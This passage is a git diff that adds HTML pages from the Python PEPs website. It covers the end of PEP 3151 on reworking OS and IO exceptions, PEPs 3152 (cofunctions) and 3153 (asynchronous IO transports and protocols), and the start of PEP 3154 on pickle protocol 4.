  • while standard exception types live in the root namespace, they are +visually distinguished by the fact that they use the CamelCase convention, +while almost all other builtins use lowercase naming (except True, False, +None, Ellipsis and NotImplemented)
  • +
+

An alternative would be to provide a separate module containing the +finer-grained exceptions, but that would defeat the purpose of +encouraging careful code over careless code, since the user would first +have to import the new module instead of using names already accessible.

+
+
+
+

Earlier discussion

+

While this is the first time such a formal proposal has been made, the idea +has received informal support in the past [1], both for the introduction +of finer-grained exception classes and for the coalescing of OSError and +IOError.

+

The removal of WindowsError alone has been discussed and rejected +as part of another PEP, +but there seemed to be a consensus that the +distinction with OSError wasn’t meaningful. This supports at least its +aliasing with OSError.

+
+
+

Implementation

+

The reference implementation has been integrated into Python 3.3. +It was formerly developed in http://hg.python.org/features/pep-3151/ in +branch pep-3151, and also tracked on the bug tracker at +http://bugs.python.org/issue12555. +It has been successfully tested on a variety of systems: Linux, Windows, +OpenIndiana and FreeBSD buildbots.

+

One source of trouble has been with the respective constructors of OSError +and WindowsError, which were incompatible. The way it is solved is by +keeping the OSError signature and adding a fourth optional argument +to allow passing the Windows error code (which is different from the POSIX +errno). The fourth argument is stored as winerror and its POSIX +translation as errno. The PyErr_SetFromWindowsErr* functions have +been adapted to use the right constructor call.

+

A slight complication is when the PyErr_SetExcFromWindowsErr* functions +are called with OSError rather than WindowsError: the errno +attribute of the exception object would store the Windows error code (such +as 109 for ERROR_BROKEN_PIPE) rather than the POSIX translation (such as 32 +for EPIPE) that it stores now. For non-socket error codes, this only occurs +in the private _multiprocessing module for which there is no compatibility +concern.

+
+

Note

+

For socket errors, the “POSIX errno” as reflected by the errno module +is numerically equal to the Windows Socket error code +returned by the WSAGetLastError system call:

+
>>> errno.EWOULDBLOCK
+10035
+>>> errno.WSAEWOULDBLOCK
+10035
+
+
+
+
+
+

Possible alternative

+
+

Pattern matching

+

Another possibility would be to introduce an advanced pattern matching +syntax when catching exceptions. For example:

+
try:
+    os.remove(filename)
+except OSError as e if e.errno == errno.ENOENT:
+    pass
+
+
+

Several problems with this proposal:

+
    +
  • it introduces new syntax, which is perceived by the author to be a heavier +change compared to reworking the exception hierarchy
  • +
  • it doesn’t decrease typing effort significantly
  • +
  • it doesn’t relieve the programmer from the burden of having to remember +errno mnemonics
  • +
+
+
+
+

Exceptions ignored by this PEP

+

This PEP ignores EOFError, which signals a truncated input stream in +various protocol and file format implementations (for example GzipFile). +EOFError is not OS- or IO-related; it is a logical error raised at +a higher level.

+

This PEP also ignores SSLError, which is raised by the ssl module +in order to propagate errors signalled by the OpenSSL library. Ideally, +SSLError would benefit from a similar but separate treatment since it +defines its own constants for error types (ssl.SSL_ERROR_WANT_READ, +etc.). In Python 3.2, SSLError is already replaced with socket.timeout +when it signals a socket timeout (see issue 10272).

+

Finally, the fate of socket.gaierror and socket.herror is not settled. +While they would deserve less cryptic names, this can be handled separately +from the exception hierarchy reorganization effort.

+
+
+

Appendix A: Survey of common errnos

+

This is a quick inventory of the various errno mnemonics checked for in +the standard library and its tests, as part of except clauses.

+
+

Common errnos with OSError

+
    +
  • EBADF: bad file descriptor (usually means the file descriptor was +closed)
  • +
  • EEXIST: file or directory exists
  • +
  • EINTR: interrupted function call
  • +
  • EISDIR: is a directory
  • +
  • ENOTDIR: not a directory
  • +
  • ENOENT: no such file or directory
  • +
  • EOPNOTSUPP: operation not supported on socket +(possible confusion with the existing io.UnsupportedOperation)
  • +
  • EPERM: operation not permitted (when using e.g. os.setuid())
  • +
+
+
+

Common errnos with IOError

+
    +
  • EACCES: permission denied (for filesystem operations)
  • +
  • EBADF: bad file descriptor (with select.epoll); read operation on a +write-only GzipFile, or vice-versa
  • +
  • EBUSY: device or resource busy
  • +
  • EISDIR: is a directory (when trying to open())
  • +
  • ENODEV: no such device
  • +
  • ENOENT: no such file or directory (when trying to open())
  • +
  • ETIMEDOUT: connection timed out
  • +
+
+
+

Common errnos with socket.error

+

All these errors may also be associated with a plain IOError, for example +when calling read() on a socket’s file descriptor.

+
    +
  • EAGAIN: resource temporarily unavailable (during a non-blocking socket +call except connect())
  • +
  • EALREADY: connection already in progress (during a non-blocking +connect())
  • +
  • EINPROGRESS: operation in progress (during a non-blocking connect())
  • +
  • EINTR: interrupted function call
  • +
  • EISCONN: the socket is connected
  • +
  • ECONNABORTED: connection aborted by peer (during an accept() call)
  • +
  • ECONNREFUSED: connection refused by peer
  • +
  • ECONNRESET: connection reset by peer
  • +
  • ENOTCONN: socket not connected
  • +
  • ESHUTDOWN: cannot send after transport endpoint shutdown
  • +
  • EWOULDBLOCK: same reasons as EAGAIN
  • +
+
+
+

Common errnos with select.error

+
    +
  • EINTR: interrupted function call
  • +
+
+
+
+

Appendix B: Survey of raised OS and IO errors

+
+

About VMSError

+

VMSError is completely unused by the interpreter core and the standard +library. It was added as part of the OpenVMS patches submitted in 2002 +by Jean-François Piéronne [4]; the motivation for including VMSError was that +it could be raised by third-party packages.

+
+
+

Interpreter core

+

Handling of PYTHONSTARTUP raises IOError (but the error gets discarded):

+
$ PYTHONSTARTUP=foox ./python
+Python 3.2a0 (py3k:82920M, Jul 16 2010, 22:53:23)
+[GCC 4.4.3] on linux2
+Type "help", "copyright", "credits" or "license" for more information.
+Could not open PYTHONSTARTUP
+IOError: [Errno 2] No such file or directory: 'foox'
+
+
+

PyObject_Print() raises IOError when ferror() signals an error on the +FILE * parameter (which, in the source tree, is always either stdout or +stderr).

+

Unicode encoding and decoding using the mbcs encoding can raise +WindowsError for some error conditions.

+
+
+

Standard library

+
+

bz2

+

Raises IOError throughout (OSError is unused):

+
>>> bz2.BZ2File("foox", "rb")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: [Errno 2] No such file or directory
+>>> bz2.BZ2File("LICENSE", "rb").read()
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: invalid data stream
+>>> bz2.BZ2File("/tmp/zzz.bz2", "wb").read()
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: file is not ready for reading
+
+
+
+
+

curses

+

Not examined.

+
+
+

dbm.gnu, dbm.ndbm

+

_dbm.error and _gdbm.error inherit from IOError:

+
>>> dbm.gnu.open("foox")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+_gdbm.error: [Errno 2] No such file or directory
+
+
+
+
+

fcntl

+

Raises IOError throughout (OSError is unused).

+
+
+

imp module

+

Raises IOError for bad file descriptors:

+
>>> imp.load_source("foo", "foo", 123)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: [Errno 9] Bad file descriptor
+
+
+
+
+

io module

+

Raises IOError when trying to open a directory under Unix:

+
>>> open("Python/", "r")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: [Errno 21] Is a directory: 'Python/'
+
+
+

Raises IOError or io.UnsupportedOperation (which inherits from the former) +for unsupported operations:

+
>>> open("LICENSE").write("bar")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: not writable
+>>> io.StringIO().fileno()
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+io.UnsupportedOperation: fileno
+>>> open("LICENSE").seek(1, 1)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: can't do nonzero cur-relative seeks
+
+
+

Raises either IOError or TypeError when the inferior I/O layer misbehaves +(i.e. violates the API it is expected to implement).

+

Raises IOError when the underlying OS resource becomes invalid:

+
>>> f = open("LICENSE")
+>>> os.close(f.fileno())
+>>> f.read()
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: [Errno 9] Bad file descriptor
+
+
+

…or for implementation-specific optimizations:

+
>>> f = open("LICENSE")
+>>> next(f)
+'A. HISTORY OF THE SOFTWARE\n'
+>>> f.tell()
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: telling position disabled by next() call
+
+
+

Raises BlockingIOError (inheriting from IOError) when a call on a non-blocking +object would block.

+
+
+

mmap

+

Under Unix, raises its own mmap.error (inheriting from EnvironmentError) +throughout:

+
>>> mmap.mmap(123, 10)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+mmap.error: [Errno 9] Bad file descriptor
+>>> mmap.mmap(os.open("/tmp", os.O_RDONLY), 10)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+mmap.error: [Errno 13] Permission denied
+
+
+

Under Windows, however, it mostly raises WindowsError (the source code +also shows a few occurrences of mmap.error):

+
>>> fd = os.open("LICENSE", os.O_RDONLY)
+>>> m = mmap.mmap(fd, 16384)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+WindowsError: [Error 5] Accès refusé
+>>> sys.last_value.errno
+13
+>>> errno.errorcode[13]
+'EACCES'
+
+>>> m = mmap.mmap(-1, 4096)
+>>> m.resize(16384)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+WindowsError: [Error 87] Paramètre incorrect
+>>> sys.last_value.errno
+22
+>>> errno.errorcode[22]
+'EINVAL'
+
+
+
+
+

multiprocessing

+

Not examined.

+
+
+

os / posix

+

The os (or posix) module raises OSError throughout, except under +Windows where WindowsError can be raised instead.

+
+
+

ossaudiodev

+

Raises IOError throughout (OSError is unused):

+
>>> ossaudiodev.open("foo", "r")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: [Errno 2] No such file or directory: 'foo'
+
+
+
+
+

readline

+

Raises IOError in various file-handling functions:

+
>>> readline.read_history_file("foo")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: [Errno 2] No such file or directory
+>>> readline.read_init_file("foo")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: [Errno 2] No such file or directory
+>>> readline.write_history_file("/dev/nonexistent")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: [Errno 13] Permission denied
+
+
+
+
+

select

+
    +
  • select() and poll objects raise select.error, which doesn’t inherit from +anything (but poll.modify() raises IOError);
  • +
  • epoll objects raise IOError;
  • +
  • kqueue objects raise both OSError and IOError.
  • +
+

As a side-note, not deriving from EnvironmentError means select.error +does not get the useful errno attribute. User code must check args[0] +instead:

+
>>> signal.alarm(1); select.select([], [], [])
+0
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+select.error: (4, 'Interrupted system call')
+>>> e = sys.last_value
+>>> e
+error(4, 'Interrupted system call')
+>>> e.errno == errno.EINTR
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+AttributeError: 'error' object has no attribute 'errno'
+>>> e.args[0] == errno.EINTR
+True
+
+
+
+
+

signal

+

signal.ItimerError inherits from IOError.

+
+
+

socket

+

socket.error inherits from IOError.

+
+
+

sys

+

sys.getwindowsversion() raises WindowsError with a bogus error number +if the GetVersionEx() call fails.

+
+
+

time

+

Raises IOError for internal errors in time.time() and time.sleep().

+
+
+

zipimport

+

zipimporter.get_data() can raise IOError.

+
+
+
+
+

Acknowledgments

+

Significant input has been received from Alyssa Coghlan.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3151.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3152/index.html b/pep-3152/index.html new file mode 100644 index 00000000000..ef431a2a2e9 --- /dev/null +++ b/pep-3152/index.html @@ -0,0 +1,267 @@ + + PEP 3152 – Cofunctions | peps.python.org
+
+


+ + +
+
+
+

PEP 3152 – Cofunctions

+
+
Author:
+
Gregory Ewing <greg.ewing at canterbury.ac.nz>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
13-Feb-2009
+
Python-Version:
+
3.3
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

A syntax is proposed for defining and calling a special type of +generator called a ‘cofunction’. It is designed to provide a +streamlined way of writing generator-based coroutines, and allow the +early detection of certain kinds of error that are easily made when +writing such code, which otherwise tend to cause hard-to-diagnose +symptoms.

+

This proposal builds on the ‘yield from’ mechanism described in PEP +380, and describes some of the semantics of cofunctions in terms of +it. However, it would be possible to define and implement cofunctions +independently of PEP 380 if so desired.

+
+

Rejection

+

See https://mail.python.org/pipermail/python-dev/2015-April/139503.html

+
+
+
+

Specification

+
+

Cofunction definitions

+

A new keyword codef is introduced which is used in place of +def to define a cofunction. A cofunction is a special kind of +generator having the following characteristics:

+
    +
  1. A cofunction is always a generator, even if it does not contain any +yield or yield from expressions.
  2. +
  3. A cofunction cannot be called the same way as an ordinary function. +An exception is raised if an ordinary call to a cofunction is +attempted.
  4. +
+
+
+

Cocalls

+

Calls from one cofunction to another are made by marking the call with +a new keyword cocall. The expression

+
cocall f(*args, **kwds)
+
+
+

is semantically equivalent to

+
yield from f.__cocall__(*args, **kwds)
+
+
+

except that the object returned by __cocall__ is expected to be an +iterator, so the step of calling iter() on it is skipped.

+

The full syntax of a cocall expression is described by the following +grammar lines:

+
atom: cocall | <existing alternatives for atom>
+cocall: 'cocall' atom cotrailer* '(' [arglist] ')'
+cotrailer: '[' subscriptlist ']' | '.' NAME
+
+
+

The cocall keyword is syntactically valid only inside a +cofunction. A SyntaxError will result if it is used in any other +context.

+

Objects which implement __cocall__ are expected to return an object +obeying the iterator protocol. Cofunctions respond to __cocall__ the +same way as ordinary generator functions respond to __call__, i.e. by +returning a generator-iterator.

+

Certain objects that wrap other callable objects, notably bound +methods, will be given __cocall__ implementations that delegate to the +underlying object.

+
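The protocol can be sketched with plain Python 3 generators; the decorator below is illustrative only and is not part of the proposal:

+
def cofunction(genfunc):
+    class _CoFunction:
+        def __call__(self, *args, **kwds):
+            # Characteristic 2 above: ordinary calls are rejected.
+            raise TypeError("cofunctions can only be co-called")
+        def __cocall__(self, *args, **kwds):
+            # Like __call__ on a generator function: return a generator-iterator.
+            return genfunc(*args, **kwds)
+    return _CoFunction()
+
+@cofunction
+def greeting():
+    yield "hello"
+
+# 'cocall greeting()' would expand to roughly 'yield from greeting.__cocall__()':
+print(list(greeting.__cocall__()))   # ['hello']
+
+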
+
+

New builtins, attributes and C API functions

+

To facilitate interfacing cofunctions with non-coroutine code, there will +be a built-in function costart whose definition is equivalent to

+
def costart(obj, *args, **kwds):
+    return obj.__cocall__(*args, **kwds)
+
+
+

There will also be a corresponding C API function

+
PyObject *PyObject_CoCall(PyObject *obj, PyObject *args, PyObject *kwds)
+
+
+

It is left unspecified for now whether a cofunction is a distinct type +of object or, like a generator function, is simply a specially-marked +function instance. If the latter, a read-only boolean attribute +__iscofunction__ should be provided to allow testing whether a +given function object is a cofunction.

+
+
+
+

Motivation and Rationale

+

The yield from syntax is reasonably self-explanatory when used for +the purpose of delegating part of the work of a generator to another +function. It can also be used to good effect in the implementation of +generator-based coroutines, but it reads somewhat awkwardly when used +for that purpose, and tends to obscure the true intent of the code.

+

Furthermore, using generators as coroutines is somewhat error-prone. +If one forgets to use yield from when it should have been used, or +uses it when it shouldn’t have, the symptoms that result can be +obscure and confusing.

+

Finally, sometimes there is a need for a function to be a coroutine +even though it does not yield anything, and in these cases it is +necessary to resort to kludges such as if 0: yield to force it to +be a generator.

+
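The kludge in question, spelled out:

+
def nothing_to_yield():
+    if 0:
+        yield   # never executed; only here so this compiles as a generator
+    # ... the coroutine's real work, which never yields, goes here ...
+
+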

The codef and cocall constructs address the first issue by +making the syntax directly reflect the intent, that is, that the +function forms part of a coroutine.

+

The second issue is addressed by making it impossible to mix coroutine +and non-coroutine code in ways that don’t make sense. If the rules +are violated, an exception is raised that points out exactly what and +where the problem is.

+

Lastly, the need for dummy yields is eliminated by making the form of +definition determine whether the function is a coroutine, rather than +what it contains.

+
+
+

Prototype Implementation

+

An implementation in the form of patches to Python 3.1.2 can be found +here:

+

http://www.cosc.canterbury.ac.nz/greg.ewing/python/generators/cofunctions.html

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3152.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3153/index.html b/pep-3153/index.html new file mode 100644 index 00000000000..0f69eb71d89 --- /dev/null +++ b/pep-3153/index.html @@ -0,0 +1,395 @@ + + PEP 3153 – Asynchronous IO support | peps.python.org
+
+


+ + +
+
+
+

PEP 3153 – Asynchronous IO support

+
+
Author:
+
Laurens Van Houtven <_ at lvh.cc>
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
29-May-2011
+
Post-History:
+

+
Superseded-By:
+
3156
+
+
+
+
+
+

Abstract

+

This PEP describes an abstraction of asynchronous IO for the Python +standard library.

+

The goal is to reach an abstraction that can be implemented by many +different asynchronous IO backends and provides a target for library +developers to write code portable between those different backends.

+
+
+

Rationale

+

People who want to write asynchronous code in Python right now have a +few options:

+
    +
  • asyncore and asynchat
  • +
  • something bespoke, most likely based on the select module
  • +
  • using a third party library, such as Twisted or gevent
  • +
+

Unfortunately, each of these options has its downsides, which this PEP +tries to address.

+

Despite having been part of the Python standard library for a long +time, the asyncore module suffers from fundamental flaws following +from an inflexible API that does not stand up to the expectations of a +modern asynchronous networking module.

+

Moreover, its approach is too simplistic to provide developers with +all the tools they need in order to fully exploit the potential of +asynchronous networking.

+

The most popular solutions used in production right now involve +third party libraries. These often provide satisfactory +solutions, but there is a lack of compatibility between these +libraries, which tends to make codebases very tightly coupled to the +library they use.

+

This current lack of portability between different asynchronous IO +libraries causes a lot of duplicated effort for third party library +developers. A sufficiently powerful abstraction could mean that +asynchronous code gets written once, but used everywhere.

+

An eventual added goal would be for standard library implementations +of wire and network protocols to evolve towards being real protocol +implementations, as opposed to standalone libraries that do everything +including calling recv() blockingly. This means they could be +easily reused for both synchronous and asynchronous code.

+
+
+

Communication abstractions

+
+

Transports

+

Transports provide a uniform API for reading bytes from and writing +bytes to different kinds of connections. Transports in this PEP are +always ordered, reliable, bidirectional, stream-oriented two-endpoint +connections. This might be a TCP socket, an SSL connection, a pipe +(named or otherwise), a serial port… It may abstract a file +descriptor on POSIX platforms or a Handle on Windows or some other +data structure appropriate to a particular platform. It encapsulates +all of the particular implementation details of using that platform +data structure and presents a uniform interface for application +developers.

+

Transports talk to two things: the other side of the connection on one +hand, and a protocol on the other. It’s a bridge between the specific +underlying transfer mechanism and the protocol. Its job can be +described as allowing the protocol to just send and receive bytes, +taking care of all of the magic that needs to happen to those bytes to +be eventually sent across the wire.

+

The primary feature of a transport is sending bytes to a protocol and +receiving bytes from the underlying transfer mechanism. Writing to the +transport is done using the write and write_sequence methods. +The latter method is a performance optimization, to allow software to +take advantage of specific capabilities in some transport mechanisms. +Specifically, this allows transports to use writev instead of write +or send, also known as scatter/gather IO.

+

A transport can be paused and resumed. This will cause it to buffer +data coming from protocols and stop sending received data to the +protocol.

+

A transport can also be closed, half-closed and aborted. A closed +transport will finish writing all of the data queued in it to the +underlying mechanism, and will then stop reading or writing data. +Aborting a transport stops it, closing the connection without sending +any data that is still queued.

+

Further writes will result in exceptions being thrown. A half-closed +transport may not be written to anymore, but will still accept +incoming data.

+
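Gathering the prose above into one place, a transport interface might look roughly as follows; the method names track the PEP’s wording, but no exact signatures are specified by it:

+
from abc import ABC, abstractmethod
+
+class Transport(ABC):
+    @abstractmethod
+    def write(self, data):
+        """Queue bytes to be sent to the other endpoint."""
+
+    @abstractmethod
+    def write_sequence(self, data_sequence):
+        """Queue several chunks at once (may map to writev/scatter-gather IO)."""
+
+    @abstractmethod
+    def pause(self):
+        """Buffer incoming data instead of delivering it to the protocol."""
+
+    @abstractmethod
+    def resume(self):
+        """Resume delivering data, including anything buffered while paused."""
+
+    @abstractmethod
+    def half_close(self):
+        """Disallow further writes while still accepting incoming data."""
+
+    @abstractmethod
+    def close(self):
+        """Flush queued outgoing data, then stop reading and writing."""
+
+    @abstractmethod
+    def abort(self):
+        """Stop immediately, discarding any queued outgoing data."""
+
+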
+
+

Protocols

+

Protocols are probably more familiar to new users. The terminology is +consistent with what you would expect from something called a +protocol: the protocols most people think of first, like HTTP, IRC, +SMTP… are all examples of something that would be implemented in a +protocol.

+

The shortest useful definition of a protocol is a (usually two-way) +bridge between the transport and the rest of the application logic. A +protocol will receive bytes from a transport and translates that +information into some behavior, typically resulting in some method +calls on an object. Similarly, application logic calls some methods +on the protocol, which the protocol translates into bytes and +communicates to the transport.

+

One of the simplest protocols is a line-based protocol, where data is +delimited by \r\n. The protocol will receive bytes from the +transport and buffer them until there is at least one complete line. +Once that’s done, it will pass this line along to some object. +Ideally that would be accomplished using a callable or even a +completely separate object composed by the protocol, but it could also +be implemented by subclassing (as is the case with Twisted’s +LineReceiver). For the other direction, the protocol could have a +write_line method, which adds the required \r\n and passes the +new bytes buffer on to the transport.

+

This PEP suggests a generalized LineReceiver called +ChunkProtocol, where a “chunk” is a message in a stream, delimited +by the specified delimiter. Instances take a delimiter and a callable +that will be called with a chunk of data once it’s received (as +opposed to Twisted’s subclassing behavior). ChunkProtocol also +has a write_chunk method analogous to the write_line method +described above.

+
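A rough sketch of such a ChunkProtocol; how the transport is associated with the protocol is left open by the PEP, so the constructor below simply takes it as an argument:

+
class ChunkProtocol:
+    def __init__(self, transport, delimiter, chunk_received):
+        self.transport = transport
+        self.delimiter = delimiter
+        self.chunk_received = chunk_received   # a callable, per the preference above
+        self._buffer = b""
+
+    def data_received(self, data):
+        # Buffer until at least one complete chunk is available.
+        self._buffer += data
+        *chunks, self._buffer = self._buffer.split(self.delimiter)
+        for chunk in chunks:
+            self.chunk_received(chunk)
+
+    def write_chunk(self, chunk):
+        self.transport.write(chunk + self.delimiter)
+
+# Exercising it with a stand-in transport that just records writes:
+class RecordingTransport:
+    def __init__(self):
+        self.sent = []
+    def write(self, data):
+        self.sent.append(data)
+
+t = RecordingTransport()
+p = ChunkProtocol(t, b"\r\n", print)
+p.data_received(b"PING\r\nPO")
+p.data_received(b"NG\r\n")   # prints b'PING', then b'PONG'
+p.write_chunk(b"OK")         # t.sent == [b'OK\r\n']
+
+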
+
+

Why separate protocols and transports?

+

This separation between protocol and transport often confuses people +who first come across it. In fact, the standard library itself does +not make this distinction in many cases, particularly not in the API +it provides to users.

+

It is nonetheless a very useful distinction. In the worst case, it +simplifies the implementation by clear separation of concerns. +However, it often serves the far more useful purpose of being able to +reuse protocols across different transports.

+

Consider a simple RPC protocol. The same bytes may be transferred +across many different transports, for example pipes or sockets. To +help with this, we separate the protocol out from the transport. The +protocol just reads and writes bytes, and doesn’t really care what +mechanism is used to eventually transfer those bytes.

+

This also allows for protocols to be stacked or nested easily, +allowing for even more code reuse. A common example of this is +JSON-RPC: according to the specification, it can be used across both +sockets and HTTP [1]. In practice, it tends to be primarily +encapsulated in HTTP. The protocol-transport abstraction allows us to +build a stack of protocols and transports that allow you to use HTTP +as if it were a transport. For JSON-RPC, that might get you a stack +somewhat like this:

+
  1. TCP socket transport
  2. HTTP protocol
  3. HTTP-based transport
  4. JSON-RPC protocol
  5. Application code
+
+
+
+

Flow control

+
+

Consumers

+

Consumers consume bytes produced by producers. Together with +producers, they make flow control possible.

+

Consumers primarily play a passive role in flow control. They get +called whenever a producer has some data available. They then process +that data, and typically yield control back to the producer.

+

Consumers typically implement buffers of some sort. They make flow +control possible by telling their producer about the current status of +those buffers. A consumer can instruct a producer to stop producing +entirely, stop producing temporarily, or resume producing if it has +been told to pause previously.

+

Producers are registered to the consumer using the register +method.

+
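Since PEP 3153 stops short of specifying a concrete API, the following sketch is only an illustration of the relationship just described; the buffer threshold and method bodies are invented for the example:

class BufferingConsumer:
    HIGH_WATER = 64 * 1024    # arbitrary threshold for this sketch

    def __init__(self):
        self.producer = None
        self._buffer = bytearray()

    def register(self, producer):
        # Register the producer; it learns about us via half_register()
        # (described in the next section).
        self.producer = producer
        producer.half_register(self)

    def write(self, data):
        # Called by the producer whenever it has data available.
        self._buffer.extend(data)
        if len(self._buffer) > self.HIGH_WATER:
            self.producer.pause()   # stop producing temporarily

    def _drain(self):
        # After processing the buffered data, let the producer continue.
        self._buffer.clear()
        self.producer.resume()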
+
+

Producers

+

Where consumers consume bytes, producers produce them.

+

Producers are modeled after the IPushProducer interface found in +Twisted. Although there is an IPullProducer as well, it is on the +whole far less interesting and therefore probably out of the scope of +this PEP.

+

Although producers can be told to stop producing entirely, the two +most interesting methods they have are pause and resume. +These are usually called by the consumer, to signify whether it is +ready to process (“consume”) more data or not. Consumers and +producers cooperate to make flow control possible.

+

In addition to the Twisted IPushProducer interface, producers have a +half_register method which is called with the consumer when the +consumer tries to register that producer. In most cases, this will +just be a case of setting self.consumer = consumer, but some +producers may require more complex preconditions or behavior when a +consumer is registered. End-users are not supposed to call this +method directly.

+
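Continuing the illustrative sketch from the section on consumers, a matching push producer might look like this (again, the concrete names beyond pause, resume and half_register are invented for the example):

class SocketProducer:
    def __init__(self, sock):
        self.sock = sock
        self.consumer = None
        self._paused = False

    def half_register(self, consumer):
        # Called by the consumer during register(); end-users do not
        # call this directly.
        self.consumer = consumer

    def pause(self):
        self._paused = True      # the consumer's buffers are full

    def resume(self):
        self._paused = False     # the consumer is ready for more data

    def _produce(self):
        # Push data at the consumer whenever we are not paused.
        if not self._paused:
            self.consumer.write(self.sock.recv(4096))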
+

Considered API alternatives

+
+
Generators as producers
+

Generators have been suggested as a way to implement producers. However, there appear to be a few problems with this.

+

First of all, there is a conceptual problem. A generator, in a sense, +is “passive”. It needs to be told, through a method call, to take +action. A producer is “active”: it initiates those method calls. A +real producer has a symmetric relationship with its consumer. In the +case of a generator-turned-producer, only the consumer would have a +reference, and the producer is blissfully unaware of the consumer’s +existence.

+

This conceptual problem translates into a few technical issues as +well. After a successful write method call on its consumer, a +(push) producer is free to take action once more. In the case of a +generator, it would need to be told, either by asking for the next +object through the iteration protocol (a process which could block +indefinitely), or perhaps by throwing some kind of signal exception +into it.

+

This signaling setup may provide a technically feasible solution, but +it is still unsatisfactory. For one, this introduces unwarranted +complexity in the consumer, which now not only needs to understand how +to receive and process data, but also how to ask for new data and deal +with the case of no new data being available.

+

This latter edge case is particularly problematic. It needs to be taken care of, since the entire operation is not allowed to block. However, generators can not raise an exception on iteration without terminating, thereby losing the state of the generator. As a result, signaling a lack of available data would have to be done using a sentinel value, instead of being done using the exception mechanism.

+

Last but not least, nobody has produced working code demonstrating how generators could be used this way.

+
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3153.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3154/index.html new file mode 100644 index 00000000000..595447e32ae --- /dev/null +++ b/pep-3154/index.html @@ -0,0 +1,385 @@ + PEP 3154 – Pickle protocol version 4 | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3154 – Pickle protocol version 4

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
11-Aug-2011
+
Python-Version:
+
3.4
+
Post-History:
+
12-Aug-2011
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Data serialized using the pickle module must be portable across Python versions. It should also support the latest language features as well as implementation-specific features. For this reason, the pickle module knows about several protocols (currently numbered from 0 to 3), each of which appeared in a different Python version. Using a low-numbered protocol version allows exchanging data with old Python versions, while using a high-numbered protocol allows access to newer features and sometimes more efficient resource use (both CPU time required for (de)serializing, and disk size / network bandwidth required for data transfer).

+
+
+

Rationale

+

The latest current protocol, coincidentally named protocol 3, appeared +with Python 3.0 and supports the new incompatible features in the +language (mainly, unicode strings by default and the new bytes +object). The opportunity was not taken at the time to improve the +protocol in other ways.

+

This PEP is an attempt to foster a number of incremental improvements +in a new pickle protocol version. The PEP process is used in order to +gather as many improvements as possible, because the introduction of a +new pickle protocol should be a rare occurrence.

+
+
+

Proposed changes

+
+

Framing

+

Traditionally, when unpickling an object from a stream (by calling +load() rather than loads()), many small read() +calls can be issued on the file-like object, with a potentially huge +performance impact.

+

Protocol 4, by contrast, features binary framing. The general structure +of a pickle is thus the following:

+
+------+------+
+| 0x80 | 0x04 |              protocol header (2 bytes)
++------+------+
+|  OP  |                     FRAME opcode (1 byte)
++------+------+-----------+
+| MM MM MM MM MM MM MM MM |  frame size (8 bytes, little-endian)
++------+------------------+
+| .... |                     first frame contents (M bytes)
++------+
+|  OP  |                     FRAME opcode (1 byte)
++------+------+-----------+
+| NN NN NN NN NN NN NN NN |  frame size (8 bytes, little-endian)
++------+------------------+
+| .... |                     second frame contents (N bytes)
++------+
+  etc.
+
+
+

To keep the implementation simple, it is forbidden for a pickle opcode +to straddle frame boundaries. The pickler takes care not to produce such +pickles, and the unpickler refuses them. Also, there is no “last frame” +marker. The last frame is simply the one which ends with a STOP opcode.

+
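The framing can be observed with the standard library itself; the disassembly below starts with the protocol header followed by a FRAME opcode and its 8-byte size argument (the exact output varies by Python version):

import pickle
import pickletools

data = pickle.dumps(["spam", "eggs"], protocol=4)
print(data[:2])        # b'\x80\x04', the 2-byte protocol header
pickletools.dis(data)  # shows FRAME <size> before the frame contents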

A well-written C implementation doesn’t need additional memory copies +for the framing layer, preserving general (un)pickling efficiency.

+
+

Note

+

How the pickler decides to partition the pickle stream into frames is an +implementation detail. For example, “closing” a frame as soon as it +reaches ~64 KiB is a reasonable choice for both performance and pickle +size overhead.

+
+
+
+

Binary encoding for all opcodes

+

The GLOBAL opcode, which is still used in protocol 3, uses the +so-called “text” mode of the pickle protocol, which involves looking +for newlines in the pickle stream. It also complicates the implementation +of binary framing.

+

Protocol 4 forbids use of the GLOBAL opcode and replaces it with +STACK_GLOBAL, a new opcode which takes its operand from the stack.

+
+
+

Serializing more “lookupable” objects

+

